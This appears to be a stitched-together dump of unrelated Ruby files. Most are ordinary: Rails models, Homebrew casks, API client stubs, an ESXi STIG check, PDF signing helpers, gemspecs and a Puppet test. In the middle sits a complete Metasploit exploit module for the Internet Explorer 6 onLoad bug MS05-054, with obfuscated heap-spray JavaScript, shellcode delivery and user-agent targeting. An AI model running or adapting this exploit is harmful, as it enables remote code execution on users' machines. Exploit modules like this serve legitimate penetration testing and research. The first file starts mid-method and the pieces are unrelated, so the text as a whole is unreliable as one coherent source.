skip_uuid_read_permission_check.include? attr r = r.readable_by(current_user) end if r.where(uuid: attr_value).count == 0 errors.add(attr, "'#{attr_value}' not found") end else # Not a valid uuid or PDH, but that (currently) is not an error. end end def ensure_valid_uuids specials = [system_user_uuid] foreign_key_attributes.each do |attr| if new_record? or send (attr + "_changed?") next if skip_uuid_existence_check.include? attr attr_value = send attr next if specials.include? attr_value check_readable_uuid attr, attr_value end end end def ensure_filesystem_compatible_name if name == "." || name == ".." errors.add(:name, "cannot be '.' or '..'") elsif Rails.configuration.Collections.ForwardSlashNameSubstitution == "" && !name.nil? && name.index('/') errors.add(:name, "cannot contain a '/' character") end end class Email def self.kind "email" end def kind self.class.kind end def self.readable_by (*u) self end def self.where (u) [{:uuid => u[:uuid]}] end end def self.resource_class_for_uuid(uuid) if uuid.is_a? ArvadosModel return uuid.class end unless uuid.is_a? String return nil end uuid.match HasUuid::UUID_REGEX do |re| return uuid_prefixes[re[1]] if uuid_prefixes[re[1]] end if uuid.match(/.+@.+/) return Email end nil end # Fill in implied zero/false values in database records that were # created before #17014 made them explicit, and reset the Rails # "changed" state so the record doesn't appear to have been modified # after loading. # # Invoked by Container and ContainerRequest models as an after_find # hook. def fill_container_defaults_after_find fill_container_defaults set_attribute_was('runtime_constraints', runtime_constraints) set_attribute_was('scheduling_parameters', scheduling_parameters) clear_changes_information end # Fill in implied zero/false values. Invoked by ContainerRequest as # a before_validation hook in order to (a) ensure every key has a # value in the updated database record and (b) ensure the attribute # whitelist doesn't reject a change from an explicit zero/false # value in the database to an implicit zero/false value in an update # request. def fill_container_defaults self.runtime_constraints = { 'API' => false, 'cuda' => { 'device_count' => 0, 'driver_version' => '', 'hardware_capability' => '', }, 'keep_cache_ram' => 0, 'ram' => 0, 'vcpus' => 0, }.merge(attributes['runtime_constraints'] || {}) self.scheduling_parameters = { 'max_run_time' => 0, 'partitions' => [], 'preemptible' => false, }.merge(attributes['scheduling_parameters'] || {}) end # ArvadosModel.find_by_uuid needs extra magic to allow it to return # an object in any class. def self.find_by_uuid uuid if self == ArvadosModel # If called directly as ArvadosModel.find_by_uuid rather than via subclass, # delegate to the appropriate subclass based on the given uuid. self.resource_class_for_uuid(uuid).find_by_uuid(uuid) else super end end def is_audit_logging_enabled? return !(Rails.configuration.AuditLogs.MaxAge.to_i == 0 && Rails.configuration.AuditLogs.MaxDeleteBatch.to_i > 0) end def schedule_restoring_changes # This will be checked at log_start_state, to reset any (virtual) changes # produced by the act of reading a serialized attribute. @fresh_from_database = true end def log_start_state if is_audit_logging_enabled? @old_attributes = Marshal.load(Marshal.dump(attributes)) @old_logged_attributes = Marshal.load(Marshal.dump(logged_attributes)) if @fresh_from_database # This instance was created from reading a database record. Attributes # haven't been changed, but those serialized attributes will be reported # as unpersisted, so we restore them to avoid issues with lock!() and # with_lock(). restore_attributes @fresh_from_database = nil end end end def log_change(event_type) if is_audit_logging_enabled? log = Log.new(event_type: event_type).fill_object(self) yield log log.save! log_start_state end end def log_create if is_audit_logging_enabled? log_change('create') do |log| log.fill_properties('old', nil, nil) log.update_to self end end end def log_update if is_audit_logging_enabled? log_change('update') do |log| log.fill_properties('old', etag(@old_attributes), @old_logged_attributes) log.update_to self end end end def log_destroy if is_audit_logging_enabled? log_change('delete') do |log| log.fill_properties('old', etag(@old_attributes), @old_logged_attributes) log.update_to nil end end end end
class Dtomo < ApplicationRecord belongs_to :user validate :name_validator validates :name, presence: :true validates :stage, inclusion: { in: [1, 2, 3, 4] } validates :evo_type, inclusion: { in: %w(good bad neutral) } validates :happiness_meter, inclusion: { in: (0..100).to_a } validates :hunger_meter, inclusion: { in: (0..100).to_a } validates :weight_meter, inclusion: { in: (0..100).to_a } validates :total_points, numericality: :true validates :evolution_countdown, numericality: :true scope :valid_dtomos, -> {where("stage < ?", 4)} def name_validator return if name =~ /\A(?=.*?[A-Za-z0-9]).{1,15}\z/ errors.add :name, "requirements not met. Length should be 1-15 characters and can only inclusion: alphanumeric characters and underscores" end end
require "vagrant/action/builder" require "vagrant-extended-storage/action" require "vagrant-extended-storage/action/manage_storage" module VagrantPlugins module ExtendedStorage module Action include Vagrant::Action::Builtin autoload :CreateAdapter, File.expand_path("../action/create_adapter.rb", __FILE__) autoload :CreateStorage, File.expand_path("../action/create_storage.rb", __FILE__) autoload :AttachStorage, File.expand_path("../action/attach_storage.rb", __FILE__) autoload :DetachStorage, File.expand_path("../action/detach_storage.rb", __FILE__) autoload :ManageStorage, File.expand_path("../action/manage_storage.rb", __FILE__) def self.create_adapter Vagrant::Action::Builder.new.tap do |builder| builder.use ConfigValidate builder.use CreateAdapter end end def self.create_storage Vagrant::Action::Builder.new.tap do |builder| builder.use ConfigValidate builder.use CreateStorage end end def self.attach_storage Vagrant::Action::Builder.new.tap do |builder| builder.use ConfigValidate builder.use AttachStorage end end def self.detach_storage Vagrant::Action::Builder.new.tap do |builder| builder.use ConfigValidate builder.use DetachStorage end end def self.manage_storage Vagrant::Action::Builder.new.tap do |builder| builder.use ConfigValidate builder.use ManageAll end end end end end
require 'ebay/types/store_theme' require 'ebay/types/store_color_scheme' module Ebay # :nodoc: module Types # :nodoc: # == Attributes # array_node :themes, 'Theme', :class => StoreTheme, :default_value => [] # array_node :generic_color_schemes, 'GenericColorSchemeArray', 'ColorScheme', :class => StoreColorScheme, :default_value => [] class StoreThemeArray include XML::Mapping include Initializer root_element_name 'StoreThemeArray' array_node :themes, 'Theme', :class => StoreTheme, :default_value => [] array_node :generic_color_schemes, 'GenericColorSchemeArray', 'ColorScheme', :class => StoreColorScheme, :default_value => [] end end end
# This file was automatically generated for ClickSend by APIMATIC v2.0 ( https://apimatic.io ). module ClickSend class HttpClient # Execute an HttpRequest when the response is expected to be a string. # @param [HttpRequest] The HttpRequest to be executed. def execute_as_string(http_request) raise NotImplementedError, 'This method needs to be implemented in a child class.' end # Execute an HttpRequest when the response is expected to be binary. # @param [HttpRequest] The HttpRequest to be executed. def execute_as_binary(http_request) raise NotImplementedError, 'This method needs to be implemented in a child class.' end # Converts the HTTP Response from the client to an HttpResponse object. # @param [Dynamic] The response object received from the client. def convert_response(response) raise NotImplementedError, 'This method needs to be implemented in a child class.' end # Get a GET HttpRequest object. # @param [String] The URL to send the request to. # @param [Hash, Optional] The headers for the HTTP Request. def get(query_url, headers: {}) return HttpRequest.new(HttpMethodEnum::GET, query_url, headers: headers) end # Get a POST HttpRequest object. # @param [String] The URL to send the request to. # @param [Hash, Optional] The headers for the HTTP Request. # @param [Hash, Optional] The parameters for the HTTP Request. def post(query_url, headers: {}, parameters: {}) return HttpRequest.new(HttpMethodEnum::POST, query_url, headers: headers, parameters: parameters) end # Get a PUT HttpRequest object. # @param [String] The URL to send the request to. # @param [Hash, Optional] The headers for the HTTP Request. # @param [Hash, Optional] The parameters for the HTTP Request. def put(query_url, headers: {}, parameters: {}) return HttpRequest.new(HttpMethodEnum::PUT, query_url, headers: headers, parameters: parameters) end # Get a PATCH HttpRequest object. # @param [String] The URL to send the request to. # @param [Hash, Optional] The headers for the HTTP Request. # @param [Hash, Optional] The parameters for the HTTP Request. def patch(query_url, headers: {}, parameters: {}) return HttpRequest.new(HttpMethodEnum::PATCH, query_url, headers: headers, parameters: parameters) end # Get a DELETE HttpRequest object. # @param [String] The URL to send the request to. # @param [Hash, Optional] The headers for the HTTP Request. def delete(query_url, headers: {}, parameters: {}) return HttpRequest.new(HttpMethodEnum::DELETE, query_url, headers: headers, parameters: parameters) end end end
# This file is copied to spec/ when you run 'rails generate rspec:install' require "spec_helper" ENV["RAILS_ENV"] ||= "test" require File.expand_path("../config/environment", __dir__) # Prevent database truncation if the environment is production abort("The Rails environment is running in production mode!") if Rails.env.production? require "rspec/rails" # Add additional requires below this line. Rails is not loaded until this point! # Requires supporting ruby files with custom matchers and macros, etc, in # spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are # run as spec files by default. This means that files in spec/support that end # in _spec.rb will both be required and run as specs, causing the specs to be # run twice. It is recommended that you do not name files matching this glob to # end with _spec.rb. You can configure this pattern with the --pattern # option on the command line or in ~/.rspec, .rspec or `.rspec-local`. # # The following line is provided for convenience purposes. It has the downside # of increasing the boot-up time by auto-requiring all files in the support # directory. Alternatively, in the individual `*_spec.rb` files, manually # require only the support files necessary. # Dir[Rails.root.join("spec", "support", "**", "*.rb")].sort.each { |f| require f } RSpec.configure do |config| # RSpec Rails can automatically mix in different behaviours to your tests # based on their file location, for example enabling you to call `get` and # `post` in specs under `spec/controllers`. # # You can disable this behaviour by removing the line below, and instead # explicitly tag your specs with their type, e.g.: # # RSpec.describe UsersController, :type => :controller do # # ... # end # # The different available types are documented in the features, such as in # https://relishapp.com/rspec/rspec-rails/docs config.infer_spec_type_from_file_location! # Filter lines from Rails gems in backtraces. config.filter_rails_from_backtrace! # arbitrary gems may also be filtered via: # config.filter_gems_from_backtrace("gem name") end
cask "kode54-cog" do version "1411,85e27e749" sha256 "89b3ef9d3252275338ae59ad5f74cbc39da21f132ae86d8920d3f7ec717c9bd4" url "https://f.losno.co/cog/Cog-#{version.after_comma}.zip", verified: "losno.co/cog/" name "Cog" homepage "https://kode54.net/cog/" livecheck do url "https://balde.losno.co/cog/mercury.xml" strategy :sparkle do |item| item.version.split("-g", 2).join(",") end end auto_updates true app "Cog.app" end
control "ESXI-67-000033" do title "The password hashes stored on the ESXi host must have been generated using a FIPS 140-2 approved cryptographic hashing algorithm." desc "Systems must employ cryptographic hashes for passwords using the SHA-2 family of algorithms or FIPS 140-2 approved successors. The use of unapproved algorithms may result in weak password hashes more vulnerable to compromise." impact 0.5 tag severity: "CAT II" tag gtitle: "SRG-OS-000480-VMM-002000" tag rid: "ESXI-67-000033" tag stig_id: "ESXI-67-000033" tag cci: "CCI-000366" tag nist: ["CM-6 b", "Rev_4"] desc 'check', "From an SSH session connected to the ESXi host, or from the ESXi shell, run the following command: # grep -i \"^password\" /etc/pam.d/passwd | grep sufficient If sha512 is not listed, this is a finding." desc 'fix', "From an SSH session connected to the ESXi host, or from the ESXi shell, add or correct the following line in /etc/pam.d/passwd : password sufficient /lib/security/$ISA/pam_unix.so use_authtok nullok shadow sha512 remember=5" command = "$vmhost = Get-VMHost -Name #{input('vmhostName')}; $esxcli = Get-EsxCli -VMHost $vmhost -V2; $esxcli.software.vib.list.Invoke() | Where {$_.Name -eq '#{input('dodStigVibRootEnabled')}' -or $_.Name -eq '#{input('dodStigVibRootDisabled')}'}" describe powercli_command(command) do its('stdout.strip') { should_not cmp "" } end end
require 'thor' require 'xcodeproj' module Objc_Obfuscator module Integrator def integrate_xcode(encryption_key, project_path, podfile_path, target_name) project = Xcodeproj::Project.open project_path main_target = project.targets.first unless target_name.empty? main_target = project.targets.select { |a| (a.name == target_name) }.first end raise Thor::Error, 'Cannot find the specified target' unless main_target phase_obf = project.new('PBXShellScriptBuildPhase') phase_obf.name = "Obfuscate strings" phase_obf.shell_path = '/bin/bash' phase_obf.shell_script = <<-SCRIPT if [ -f "$HOME/.rvm/scripts/rvm" ]; then source $HOME/.rvm/scripts/rvm rvm rvmrc trust rvm rvmrc load fi for file in `grep -rl __obfuscate ${SRCROOT}/*.h`; do; objc-obfuscator obfuscate #{encryption_key}; done" for file in `grep -rl __obfuscate ${SRCROOT}/*.m`; do; objc-obfuscator obfuscate #{encryption_key}; done" SCRIPT phase_unobf = project.new('PBXShellScriptBuildPhase') phase_unobf.name = "Unobfuscate strings" phase_unobf.shell_path = '/bin/bash' phase_unobf.shell_script = <<-SCRIPT find ${SRCROOT} -name "*.bak" -exec bash -c 'mv -f "$1" "${1%.bak}"' _ {} \\; SCRIPT build_source_phase_idx = main_target.build_phases.index main_target.source_build_phase obf_phase_idx = build_source_phase_idx main_target.build_phases.insert obf_phase_idx, phase_obf phase_unobf_idx = build_source_phase_idx+2 if(phase_unobf_idx >= main_target.build_phases.size) main_target.build_phases << phase_unobf else main_target.build_phases.insert phase_unobf_idx, phase_unobf end project.save if File.readlines(podfile_path).grep(/objc_obfuscator/).size == 0 File.open(podfile_path, 'a') {|f| f.write('pod "FWTObfuscator"') } end say_status :info, 'The project has been correctly update. Please run "pod install" to install the required pods', :blue end end end
cask "keeweb" do version "1.18.7" if Hardware::CPU.intel? sha256 "f99146aebc34b59ec5ea56ffde2048c860feb69d69b958643efd7485fa7a0135" url "https://github.com/keeweb/keeweb/releases/download/v#{version}/KeeWeb-#{version}.mac.x64.dmg", verified: "github.com/keeweb/keeweb/" else sha256 "6e4870b1660b91e735eaf30e7d751c7bb8dfae623d5b6c47899bd4d5ab1e6cae" url "https://github.com/keeweb/keeweb/releases/download/v#{version}/KeeWeb-#{version}.mac.arm64.dmg", verified: "github.com/keeweb/keeweb/" end name "KeeWeb" desc "Password manager compatible with KeePass" homepage "https://keeweb.info/" livecheck do url :url strategy :github_latest end auto_updates true app "KeeWeb.app" uninstall_preflight do set_ownership "#{appdir}/KeeWeb.app" end end
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution', 'Description' => %q{ This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation. }, 'License' => MSF_LICENSE, 'Author' => [ 'Benjamin Tobias Franz', # Discovery 'Stuart Pearson', # Proof of Concept 'Sam Sharps' # Metasploit port ], 'References' => [ ['MSB', 'MS05-054'], ['CVE', '2005-1790'], ['OSVDB', '17094'], ['BID', '13799'], ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ], [ 'Internet Explorer 6 Windows 2000', { 'iframes' => 8 } ], ], 'DisclosureDate' => 'Nov 21 2005', 'DefaultTarget' => 0)) end def exploit @var_redir = rand_text_alpha(rand(100)+1) super end def auto_target(cli, request) mytarget = nil agent = request.headers['User-Agent'] print_status("Checking user agent: #{agent}") if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/) mytarget = targets[0] # IE6 on XP elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/) mytarget = targets[1] # IE6 on 2000 else print_error("Unknown User-Agent #{agent}") end mytarget end def on_request_uri(cli, request) mytarget = auto_target(cli, request) var_title = rand_text_alpha(rand(100) + 1) func_main = rand_text_alpha(rand(100) + 1) heapspray = ::Rex::Exploitation::JSObfu.new %Q| function heapspray() { shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}'); var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 250; i++){ memory[i] = block + shellcode } var ret = ""; var fillmem = ""; for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F"); for (i = 0; i < 200; i++) fillmem += ret; prompt(fillmem, ""); } | heapspray.obfuscate nofunc = ::Rex::Exploitation::JSObfu.new %Q| if (document.location.href.indexOf("#{@var_redir}") == -1) { var counter = 0; top.consoleRef = open('','BlankWindow', 'width=100,height=100' +',menubar=0' +',toolbar=1' +',status=0' +',scrollbars=0' +',left=1' +',top=1' +',resizable=1') self.focus() for (counter = 0; counter < #{mytarget['iframes']}; counter++) { top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>'); } document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">"); } else { #{heapspray.sym('heapspray')}(); } | nofunc.obfuscate main = %Q| function #{func_main}() { document.write("<TITLE>#{var_title}</TITLE>"); document.write("<body onload=window();>"); window.location.reload(); } | html = %Q| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-gb"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <script> #{nofunc} #{heapspray} #{main} </script> </head> <body> </body> </html> | print_status("Sending #{self.name}") # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end end
require 'openssl' require 'origami' include Origami Origami.module_eval do self::PDF.class_eval do def to_blob output end def signature_page(page, options={}) outer_leading = 10 optimus_width = 180 optimus_height = 22 * 3 # Define the attributes of a box where we will put our annotation + mox stamp + description box = { x: page.MediaBox[2].to_f - optimus_width - outer_leading, y: outer_leading, width: optimus_width, height: optimus_height } contents = Origami::ContentStream.new # Load stamp avatar and add reference to the page if options[:annot_stamp][:avatar] stamp_avatar_options = { x: box[:x], y: box[:y] + 2.5, width: 60, height: 60 } stamp_avatar = Origami::Graphics::ImageXObject.from_image_file(options[:annot_stamp][:avatar].tempfile.path) options[:annot_stamp][:avatar].tempfile.close! stamp_avatar.Width = stamp_avatar_options[:width] stamp_avatar.Height = stamp_avatar_options[:height] stamp_avatar.ColorSpace = Origami::Graphics::Color::Space::DEVICE_RGB stamp_avatar.BitsPerComponent = 8 stamp_avatar.Interpolate = true page.add_xobject(:stamp_avatar, stamp_avatar) # Draw the image inside the box area contents.draw_image(:stamp_avatar, stamp_avatar_options) end # Write the description text inside the box area text = line = '' options[:annot].each_with_index do |value,| value[0] = value[0].capitalize.gsub('_', ' ') value[1] = Date.today.to_formatted_s(:rfc822) if value[1] == 'today' line = "#{value[0]}: #{value[1]}" text += "\n" if text != '' text += line end page.add_font(:TimesRoman, Origami::Font::Type1::Standard::TimesRoman.new.pre_build) write_box = { x: box[:x] + stamp_avatar_options[:width] + 5, y: stamp_avatar_options[:y] + stamp_avatar_options[:height] - 5 } contents.write(text, { :x => write_box[:x], :y => write_box[:y], :rendering => Origami::Text::Rendering::FILL, :size => 8, :leading => 8, :font => :TimesRoman, :stroke_color => Origami::ContentStream::DEFAULT_STROKE_COLOR }) # Load stamp sign and add reference to the page if options[:annot_stamp][:sign] stamp_sign_options = { :x => write_box[:x], :y => stamp_avatar_options[:y], width: 50, height: 34 } stamp_sign = Origami::Graphics::ImageXObject.from_image_file(options[:annot_stamp][:sign].tempfile.path) options[:annot_stamp][:sign].tempfile.close! stamp_sign.Width = stamp_sign_options[:width] stamp_sign.Height = stamp_sign_options[:height] stamp_sign.ColorSpace = Origami::Graphics::Color::Space::DEVICE_RGB stamp_sign.BitsPerComponent = 8 stamp_sign.Interpolate = true page.add_xobject(:stamp_sign, stamp_sign) # Draw the image inside the box area contents.draw_image(:stamp_sign, stamp_sign_options) end # Set the contentstream with (stamp + text) as the contents of the page contents.draw_rectangle(box[:x], box[:y], box[:width], box[:height]) page.setContents([page.Contents, contents]) # Create the signature annotaion over the content area box annotation = Origami::Annotation::Widget::Signature.new annotation.Rect = Origami::Rectangle[ :llx => box[:x], :lly => box[:y] + box[:height], :urx => box[:x] + box[:width], :ury => box[:y] ] # Add the signature annotation to the page page.add_annot(annotation) [page, annotation] end end def self.create_cert_and_keys(options={}) if options[:RSAPrivateKey] and options[:PassPhrase] and options[:X509Certificate] key = OpenSSL::PKey::RSA.new options[:RSAPrivateKey], options[:PassPhrase] cert = OpenSSL::X509::Certificate.new options[:X509Certificate] return [cert, key] end key = OpenSSL::PKey::RSA.new 2048 public_key = key.public_key c = options[:cert][:country] || 'CO' st = options[:cert][:estado] || 'Ciudad Habana' l = options[:cert][:locality] || 'Habana vieja' o = options[:cert][:organization] || 'Edificio Bacardi' ou = options[:cert][:organizational_unit] || 'OpenJAF' cn = options[:cert][:cn] || 'www.openjaf.com/emailAddress=openjaf@gmail.com' subject = "/C=#{c}/ST=#{st}/L=#{l}/O=#{o}/OU=#{ou}/CN=#{cn}" cert = OpenSSL::X509::Certificate.new cert.subject = cert.issuer = OpenSSL::X509::Name.parse(subject) cert.not_before = Time.now validity = options[:cert][:validity] || 1.year cert.not_after = Time.now + validity cert.public_key = public_key cert.serial = 0x0 cert.version = 2 ef = OpenSSL::X509::ExtensionFactory.new ef.subject_certificate = cert ef.issuer_certificate = cert cert.extensions = [ ef.create_extension('basicConstraints', 'CA:TRUE', true), ef.create_extension('subjectKeyIdentifier', 'hash'), ] cert.add_extension ef.create_extension('authorityKeyIdentifier', 'keyid:always,issuer:always') cert.sign key, OpenSSL::Digest::SHA256.new [cert, key] end def self.sign_pdf(input_pdf, options = {}) self::PDF.convert_to_signable input_pdf.tempfile.path, input_pdf.tempfile.path cert, key = self.create_cert_and_keys(options) pdf = self::PDF.read(input_pdf.tempfile.path) original_filename = input_pdf.original_filename output_filename = original_filename.dup.insert(original_filename.rindex('.'), '_signed') input_pdf.tempfile.close! annotation = pdf.signature_page(pdf.pages.last, options)[1] # Sign the PDF with the specified keys pdf.sign(cert, key, :method => 'adbe.pkcs7.sha1', :annotation => annotation, :location => options[:cert][:location], :contact => options[:annot][:contact], :reason => options[:cert][:reason], :issuer => options[:cert][:issuer], ) [pdf.to_blob, output_filename] end end
class StakeCurrency < DbConnection::KitSaasSubenv enum status: { GlobalConstant::StakeCurrency.setup_in_progress_status => 1, GlobalConstant::StakeCurrency.active_status => 2, GlobalConstant::StakeCurrency.inactive_status => 3 } serialize :constants, JSON # Format data to a format which goes into cache # # * Author: Santhosh # * Date: 11/04/2019 # * Reviewed By: # # @return [Hash] # def formatted_cache_data { id: id, name: name, symbol: symbol, decimal: decimal, contract_address: contract_address, constants: constants, status: status } end # Fetch from db # # * Author: Santhosh # * Date: 11/04/2019 # * Reviewed By: # # @return [Array] # def self.fetch_from_db data = [] StakeCurrency.all.each do |row| data << row.formatted_cache_data end data end # Id to details cache # # * Author: Santhosh # * Date: 11/04/2019 # * Reviewed By: # # @return [Hash] # def self.ids_to_details_cache @ids_to_details_cache ||= begin data = {} StakeCurrency.fetch_from_db.each do |row| data[row[:id]] = row end data end end # Symbol to details cache # # * Author: Santhosh # * Date: 11/04/2019 # * Reviewed By: # # @return [Hash] # def self.symbols_to_details_cache @symbols_to_details_cache ||= begin data = {} StakeCurrency.fetch_from_db.each do |row| data[row[:symbol]] = row end data end end # Symbol to details cache ONLY of active stake currencies # # * Author: Shlok # * Date: 15/05/2019 # * Reviewed By: # # @return [Hash] # def self.active_stake_currencies_by_symbol @active_stake_currencies_by_symbol ||= begin StakeCurrency.symbols_to_details_cache.select { |_,data| data[:status] == GlobalConstant::StakeCurrency.active_status} end end end
# frozen_string_literal: true lib = File.expand_path('../lib', __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'well_secure_password/version' Gem::Specification.new do |spec| spec.name = 'well_secure_password' spec.version = WellSecurePassword::VERSION spec.platform = Gem::Platform::RUBY spec.authors = ['Damian Śliwecki'] spec.email = ['sliwecki@gmail.com'] spec.summary = %q{Next generation plugin to secure your clients password} spec.description = spec.summary spec.homepage = 'https://github.com/sliwecki/well_secure_password' spec.license = 'MIT' spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(spec)/}) } spec.require_paths = %w[lib] spec.add_dependency 'activesupport', '>= 4.0' spec.add_dependency 'dry-configurable', '>= 0.7' spec.add_development_dependency 'bundler' spec.add_development_dependency 'rake' spec.add_development_dependency 'rspec' end
Pod::Spec.new do |s| s.name = 'RealmLoginKit' s.version = '0.1.3' s.license = { :type => 'Apache-2.0', :file => 'LICENSE' } s.summary = 'A generic login view controller for apps that use the Realm Mobile Platform' s.homepage = 'https://realm.io' s.author = { 'Realm' => 'help@realm.io' } s.source = { :git => 'https://github.com/realm-demos/realm-loginkit.git', :tag => s.version.to_s } s.requires_arc = true s.platform = :ios, '9.0' s.default_subspec = 'Core' s.dependency 'Realm' s.dependency 'TORoundedTableView' s.subspec 'Core' do |core| core.source_files = '**/RealmLoginKit/**/*.{swift}' core.exclude_files = '**/RealmLoginKit/Models/AuthenticationProviders/*' end s.subspec 'AWSCognito' do |aws| aws.source_files = '**/RealmLoginKit/**/*.{swift}' aws.dependency 'AWSCognito' aws.dependency 'AWSCognitoIdentityProvider' end end
module Poly::Controller require 'poly/controller/content_for_extender' require 'poly/controller/pagination_extender' require 'poly/controller/actions_extender' require 'poly/view/presentations' class Base < ::InheritedResources::Base include ContentForExtender include PaginationExtender include ActionsExtender layout :poly attr_accessor :presentations attr_accessor :pagination_on attr_reader :actions_list class << self public :defaults public :actions, :custom_actions public :belongs_to, :polymorphic_belongs_to, :singleton_belongs_to, :optional_belongs_to public :with_role, :without_protection end def initialize(&block) instance_eval(&block) if block_given? prepare_views end def method_missing(name, *args, &block) self.class.send(name, *args, &block) end def configuration resources_configuration[:self] end protected def prepare_views @presentations = {} prepared_actions.each do |action| @presentations[action] = "::Poly::View::Presentations::#{action.capitalize}Presentation".constantize.new(self) end end def prepared_actions @actions_list = [] ::InheritedResources::ACTIONS.each do |action| @actions_list << action if self.respond_to?(action) end excepted_actions = [:create, :update, :destroy] @actions_list.reject {|a| excepted_actions.include?(a) } end end end
#! /usr/bin/env ruby require 'spec_helper' require 'yaml' require 'puppet/util/network_device' require 'puppet/util/network_device/netapp/device' describe Puppet::Util::NetworkDevice::Netapp::Facts do let :transport do mock 'netapp server' end let :version do YAML.load_file(my_fixture('system-get-version.yml')) end let :info do YAML.load_file(my_fixture('system-get-info.yml')) end let :info2 do YAML.load_file(my_fixture('system-get-info2.yml')) end let :domainname do YAML.load_file(my_fixture('options-get-dns.domainname.yml')) end let :network do YAML.load_file(my_fixture('network-iface-get.yml')) end let :result_failed do n = NaElement.new("results") n.attr_set("status", "failed") n.attr_set("reason", "No response received") n.attr_set("errno", 13001) n end let :facts do described_class.new(transport).retrieve end before :each do transport.expects(:invoke).with('system-get-version').returns version transport.expects(:invoke).with('options-get', 'name', 'dns.domainname').returns domainname end describe "#retrieve" do it "should mixin the version from system-get-version" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts["version"].should == "NetApp Release 8.1P2 7-Mode: Tue Jun 12 17:53:00 PDT 2012 Multistore" end it "should mixin the domainname from options-get" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts["domain"].should == 'example.com' end it "should seperate domain-name from hostname" do transport.expects(:invoke).with('system-get-info').returns info2 transport.expects(:invoke).with('net-ifconfig-get').returns network facts['fqdn'].should == 'filer02.example.com' facts['hostname'].should == 'filer02' facts['domain'].should == 'example.com' end it "should not gather interface facts if net-ifconfig-get is not supported" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns result_failed Puppet.expects(:debug).with('API call net-ifconfig-get failed. Probably not supported. Not gathering interface facts') facts end it "should create an \"ipaddress\" fact for each interfaces if net-ifconfig-get is supported" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts['ipaddress_e0a'].should == '' facts.should_not have_key('ipaddress_e0b') facts.should_not have_key('ipaddress_e0c') facts.should_not have_key('ipaddress_e0d') facts['ipaddress_e0M'].should == '' end it "should create a \"netmask\" fact for each interfaces if net-ifconfig-get is supported" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts['netmask_e0a'].should == '' facts.should_not have_key('netmask_e0b') facts.should_not have_key('netmask_e0c') facts.should_not have_key('netmask_e0d') facts['netmask_e0M'].should == '' end it "should create a \"macaddress\" fact for each interface if net-ifconfig-get is supported" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts["macaddress_e0a"].should == '00:0c:29:77:e8:78' facts["macaddress_e0b"].should == '00:0c:29:77:e8:82' facts["macaddress_e0c"].should == '00:0c:29:77:e8:8c' facts["macaddress_e0d"].should == '00:0c:29:77:e8:96' facts["macaddress_e0M"].should == '00:0c:29:77:e8:A0' end it "should create an \"interfaces\" fact as a comma separated list of interfaces" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts["interfaces"].should == 'e0a,e0b,e0c,e0d,e0M' end { :productname => 'FAS3240', :manufacturer => 'NetApp', :osfamily => 'NetApp', :operatingsystem => 'OnTAP', :operatingsystemrelease => '8.1P2', :hostname => 'filer01', :fqdn => 'filer01.example.com', :domain => 'example.com', :uniqueid => '1918293798', :serialnumber => '123289979812', :processorcount => '4', :memorysize_mb => '8192', :memorysize => '8192 MB', :hardwareisa => 'Intel(R) Xeon(R) CPU L5410 @ 2.33GHz', :is_clustered => 'false', :macaddress => '00:0c:29:77:e8:A0', :ipaddress => '', :netmask => '', }.each do |fact, expected_value| it "should return #{expected_value} for #{fact}" do transport.expects(:invoke).with('system-get-info').returns info transport.expects(:invoke).with('net-ifconfig-get').returns network facts[fact.to_s].should == expected_value end end end end
